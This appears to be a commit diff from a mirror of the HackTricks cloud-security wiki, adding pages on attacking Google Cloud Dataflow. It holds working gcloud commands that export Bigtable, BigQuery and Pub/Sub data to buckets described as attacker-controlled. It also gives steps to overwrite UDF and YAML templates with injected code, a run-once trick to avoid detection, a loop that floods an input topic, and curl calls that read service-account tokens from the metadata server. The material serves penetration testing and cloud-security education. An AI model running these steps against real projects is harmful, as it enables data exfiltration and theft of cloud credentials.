mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-03-12 21:22:57 -07:00
added new GCP Dataflow exploitation, privilege escalation, and enumeration sections
@@ -95,6 +95,7 @@
- [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
- [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
- [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md)
- [GCP - Dataflow Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md)
- [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md)
- [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md)
- [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md)
@@ -123,6 +124,7 @@
- [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)
- [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md)
- [GCP - Dataproc Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md)
- [GCP - Dataflow Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md)
- [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md)
- [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md)
- [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md)
@@ -176,6 +178,7 @@
- [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
- [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
- [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
- [GCP - Dataflow Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md)
- [GCP - Dataproc Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md)
- [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
- [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
@@ -0,0 +1,49 @@

# GCP - Dataflow Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Dataflow

For more information about Dataflow check:

{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}

### Using Dataflow to exfiltrate data from other services

**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over a SA with access to source and sink)

With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique once you have obtained Dataflow access, for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).

> [!NOTE]
> You need `iam.serviceAccounts.actAs` over a service account with sufficient permissions to read the source and write to the sink. If none is specified, the Compute Engine default SA is used.

#### Bigtable to GCS

See the "Dump rows to your bucket" section in [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.

<details>

<summary>Export Bigtable to attacker-controlled bucket</summary>

```bash
gcloud dataflow jobs run <job-name> \
  --gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
  --staging-location=gs://<YOUR_BUCKET>/staging/
```

</details>
#### BigQuery to GCS

Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket.
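As a sketch, one Google-provided option is the `BigQuery_to_Parquet` flex template. The template path and parameter names below follow the public template layout but may vary by version; `<PROJECT>`, `<DATASET>`, `<TABLE>`, `<REGION>`, and `<YOUR_BUCKET>` are placeholders:

```bash
# Launch the BigQuery export flex template, writing Parquet files to your bucket
gcloud dataflow flex-template run "bq-exfil-job" \
  --template-file-gcs-location=gs://dataflow-templates-<REGION>/latest/flex/BigQuery_to_Parquet \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=tableRef=<PROJECT>:<DATASET>.<TABLE>,bucket=gs://<YOUR_BUCKET>/exfil
```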
#### Pub/Sub and streaming sources

Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
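For example, the Google-provided `Cloud_PubSub_to_GCS_Text` streaming template continuously writes messages from a topic to text files in a bucket (placeholders as above; parameter names can differ between template versions):

```bash
# Stream messages from the victim topic into your bucket
gcloud dataflow jobs run pubsub-exfil \
  --gcs-location=gs://dataflow-templates-<REGION>/latest/Cloud_PubSub_to_GCS_Text \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=inputTopic=projects/<PROJECT>/topics/<TOPIC>,outputDirectory=gs://<YOUR_BUCKET>/exfil/,outputFilenamePrefix=msgs
```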
{{#include ../../../banners/hacktricks-training.md}}
@@ -0,0 +1,173 @@

# GCP - Dataflow Privilege Escalation

{{#include ../../../banners/hacktricks-training.md}}

## Dataflow

{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}
### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`

Dataflow does not validate the integrity of UDFs and job template YAMLs stored in GCS. With write access to the bucket, you can overwrite these files to inject code, execute it on the workers, steal service account tokens, or alter data processing.

Both batch and streaming pipeline jobs are viable targets. To hit a pipeline, you need to replace the UDFs/templates before the job runs: during the first few minutes (before the job workers are created), or during the job run before new workers spin up due to autoscaling.

**Attack vectors:**

- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets
> [!WARNING]
> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check if a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it exists, skip the malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not per line.
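The coordination pattern can be sketched and sanity-checked locally. The marker path and payload below are placeholders for whatever a real UDF would do:

```python
import os
import tempfile

# Marker file path; a real UDF would use something like /tmp/pwnd.txt on the worker
MARKER = os.path.join(tempfile.gettempdir(), "demo_marker.txt")

payload_runs = 0

def _payload():
    # Placeholder for the malicious code (token theft, exfiltration, ...)
    global payload_runs
    payload_runs += 1

def transform(line):
    # Called once per row/line by the pipeline
    if not os.path.exists(MARKER):
        _payload()
        open(MARKER, "w").close()  # drop the marker so later rows skip the payload
    return line  # original UDF logic would go here

# Simulate a worker processing many rows: the payload fires only once
if os.path.exists(MARKER):
    os.remove(MARKER)
for row in ["a", "b", "c", "d"]:
    transform(row)
print(payload_runs)
os.remove(MARKER)
```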
#### Direct exploitation via gcloud CLI

1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:

<details>

<summary>List jobs and describe to get template path, staging location, and UDF references</summary>

```bash
# List jobs (optionally filter by region)
gcloud dataflow jobs list --region=<region>
gcloud dataflow jobs list --project=<PROJECT_ID>

# Describe a job to get template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <JOB_ID> --region=<region> --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
```

</details>
2. Download the original UDF or job template from GCS:

<details>

<summary>Download UDF file or YAML template from bucket</summary>

```bash
# If the job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py

# Or for a YAML job template
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
```

</details>
3. Edit the file locally: inject the malicious payload (see the Python UDF or YAML snippets below) and ensure the run-once coordination pattern is used.
4. Re-upload to overwrite the original file:

<details>

<summary>Overwrite UDF or template in bucket</summary>

```bash
gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py

# Or for YAML
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
```

</details>
5. Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.
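A crude way to force autoscaling on a Pub/Sub-fed streaming pipeline, assuming you can publish to its input topic (`<INPUT_TOPIC>` is a placeholder and the volume needed depends on the pipeline's autoscaling settings):

```bash
# Flood the input topic so the streaming job scales out and new workers
# pull the now-poisoned UDF/template from GCS
for i in $(seq 1 10000); do
  gcloud pubsub topics publish <INPUT_TOPIC> --message="flood-$i"
done
```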
#### Python UDF injection

If you want the worker to exfiltrate data to your C2 server, use `urllib.request` and not `requests`: `requests` is not preinstalled on classic Dataflow workers.
<details>

<summary>Malicious UDF with run-once coordination and metadata extraction</summary>

```python
import os
import json
import urllib.request
from datetime import datetime

def _malicious_func():
    # File-based coordination: run once per worker.
    coordination_file = "/tmp/pwnd.txt"
    if os.path.exists(coordination_file):
        return

    # malicious code goes here

    # Drop the marker so subsequent rows on this worker skip the payload
    open(coordination_file, "w").close()

def transform(line):
    # Malicious code entry point - runs per line, but the coordination
    # file ensures the payload executes only once per worker
    try:
        _malicious_func()
    except Exception:
        pass
    # ... original UDF logic follows ...
```

</details>
#### Job template YAML injection

Inject a `MapToFields` step with a callable that uses a coordination file. For YAML-based pipelines that support `requests`, use it if the template declares `dependencies: [requests]`; otherwise prefer `urllib.request`.

Add the cleanup step (`drop: [malicious_step]`) so the pipeline still writes valid data to the destination.
<details>

<summary>Malicious MapToFields step and cleanup in pipeline YAML</summary>

```yaml
- name: MaliciousTransform
  type: MapToFields
  input: Transform
  config:
    language: python
    fields:
      malicious_step:
        callable: |
          def extract_and_return(row):
              import os
              import json
              from datetime import datetime
              coordination_file = "/tmp/pwnd.txt"
              if os.path.exists(coordination_file):
                  return "done"
              try:
                  import urllib.request
                  # malicious code goes here
                  open(coordination_file, "w").close()
              except Exception:
                  pass
              return "done"
    append: true
- name: CleanupTransform
  type: MapToFields
  input: MaliciousTransform
  config:
    fields: {}
    append: true
    drop:
      - malicious_step
```

</details>
### Compute Engine access to Dataflow Workers

**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection

Dataflow workers run as Compute Engine VMs. Access to workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code.
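From a shell on a worker, the token can be pulled with a standard GCE metadata-server query:

```bash
# Read the worker SA's OAuth access token from the metadata server
curl -s -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"

# List the service accounts attached to the worker
curl -s -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/"
```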
For exploitation details, see:

- [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
## References

- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)

{{#include ../../../banners/hacktricks-training.md}}
@@ -0,0 +1,79 @@

# GCP - Dataflow Enum

{{#include ../../../banners/hacktricks-training.md}}

## Basic Information

**Google Cloud Dataflow** is a fully managed service for **batch and streaming data processing**. It enables organizations to build pipelines that transform and analyze data at scale, integrating with Cloud Storage, BigQuery, Pub/Sub, and Bigtable. Dataflow pipelines run on worker VMs in your project; templates and User-Defined Functions (UDFs) are often stored in GCS buckets. [Learn more](https://cloud.google.com/dataflow).
## Components

A Dataflow pipeline typically includes:

- **Template:** YAML or JSON definitions (and Python/Java code for flex templates) stored in GCS that define the pipeline structure and steps.
- **Launcher:** A short-lived Compute Engine instance that validates the template and prepares containers before the job runs.
- **Workers:** Compute Engine VMs that execute the actual data processing tasks, pulling UDFs and instructions from the template.
- **Staging/Temp buckets:** GCS buckets that store temporary pipeline data, job artifacts, UDF files, and flex template metadata (`.json`).
## Batch vs Streaming Jobs

Dataflow supports two execution modes:

**Batch jobs:** Process a fixed, bounded dataset (e.g. a log file, a table export). The job runs once to completion and then terminates. Workers are created for the duration of the job and shut down when done. Batch jobs are typically used for ETL, historical analysis, or scheduled data migrations.

**Streaming jobs:** Process unbounded, continuously arriving data (e.g. Pub/Sub messages, live sensor feeds). The job runs until explicitly stopped. Workers may scale up and down; new workers can be spawned due to autoscaling, and they will pull pipeline components (templates, UDFs) from GCS at startup.
## Enumeration

Dataflow jobs and related resources can be enumerated to gather service accounts, template paths, staging buckets, and UDF locations.

### Job Enumeration

To enumerate Dataflow jobs and retrieve their details:

```bash
# List Dataflow jobs in the project
gcloud dataflow jobs list

# List Dataflow jobs (by region)
gcloud dataflow jobs list --region=<region>

# Describe job (includes service account, template GCS path, staging location, parameters)
gcloud dataflow jobs describe <job-id> --region=<region>
```
Job descriptions reveal the template GCS path, staging location, and worker service account, which helps identify the buckets that store pipeline components.
### Template and Bucket Enumeration

Buckets referenced in job descriptions may contain flex templates, UDFs, or YAML pipeline definitions:

```bash
# List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
gcloud storage ls gs://<bucket>/

# List objects recursively
gcloud storage ls gs://<bucket>/**
```
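Flex-template metadata `.json` files found in these buckets describe the template's parameters, which is useful for working out what a job launched from the template will accept. A quick local triage sketch (the metadata below is an illustrative example modeled on the documented name/description/parameters schema, not a real file):

```python
import json

# Illustrative flex-template metadata; real files may carry more fields
metadata = json.loads("""
{
  "name": "Streaming Beam SQL",
  "description": "An example flex template.",
  "parameters": [
    {"name": "inputSubscription", "label": "Input subscription", "helpText": "Pub/Sub subscription to read from."},
    {"name": "outputTable", "label": "Output table", "helpText": "BigQuery table to write to."}
  ]
}
""")

# Pull out the parameter names the template accepts
params = [p["name"] for p in metadata.get("parameters", [])]
print(params)
```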
## Privilege Escalation

{{#ref}}
../gcp-privilege-escalation/gcp-dataflow-privesc.md
{{#endref}}

## Post Exploitation

{{#ref}}
../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
{{#endref}}

## Persistence

{{#ref}}
../gcp-persistence/gcp-dataflow-persistence.md
{{#endref}}

{{#include ../../../banners/hacktricks-training.md}}